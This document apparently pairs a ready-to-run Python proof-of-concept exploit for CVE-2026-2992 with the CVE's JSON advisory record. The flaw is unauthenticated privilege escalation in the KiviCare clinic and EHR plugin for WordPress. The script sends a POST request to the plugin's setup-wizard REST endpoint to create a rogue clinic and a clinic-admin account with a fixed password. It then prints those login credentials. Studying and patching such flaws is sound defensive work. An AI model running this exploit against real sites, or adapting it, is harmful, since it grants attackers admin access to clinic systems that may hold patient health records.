CVE-2026-2992

import requests import json # CVE-2026-2992 PoC - KiviCare Privilege Escalation # Target: WordPress site with KiviCare plugin <= 4.1.2 TARGET_URL = "http://target-wordpress-site.com" API_ENDPOINT = "/wp-json/kivicare/v1/setup-wizard/clinic" # Payload to create clinic and admin user payload = { "clinic_name": "Malicious Clinic", "clinic_email": "[email protected]", "clinic_phone": "1234567890", "clinic_address": "Attacker's Address", "user_email": "[email protected]", "user_password": "P@ssw0rd123!", "user_role": "clinic_admin" } def exploit(): url = TARGET_URL + API_ENDPOINT headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } print(f"[*] Exploiting CVE-2026-2992 on {TARGET_URL}") print(f"[*] Target endpoint: {url}") try: response = requests.post(url, json=payload, headers=headers, timeout=30) if response.status_code in [200, 201, 200]: print("[+] Success! Clinic and admin user created.") print(f"[+] Response: {response.text}") print(f"[*] Login with: [email protected] / P@ssw0rd123!") else: print(f"[-] Failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-2992", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:27.583", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization on the `/wp-json/kivicare/v1/setup-wizard/clinic` REST API endpoint in all versions up to, and including, 4.1.2. This makes it possible for unauthenticated attackers to create a new clinic and a WordPress user with clinic admin privileges."}, {"lang": "es", "value": "El plugin KiviCare – Clinic &amp; Patient Management System (EHR) para WordPress es vulnerable a la escalada de privilegios debido a la falta de autorización en el endpoint de la API REST `/wp-json/kivicare/v1/setup-wizard/clinic` en todas las versiones hasta la 4.1.2, inclusive. Esto permite a atacantes no autenticados crear una nueva clínica y un usuario de WordPress con privilegios de administrador de clínica."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L162", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/api/SetupWizardController.php#L31", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3467409/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d96743ea-08b1-4b4c-9d62-558b97a6e297?source=cve", "source": "[email protected]"}]}}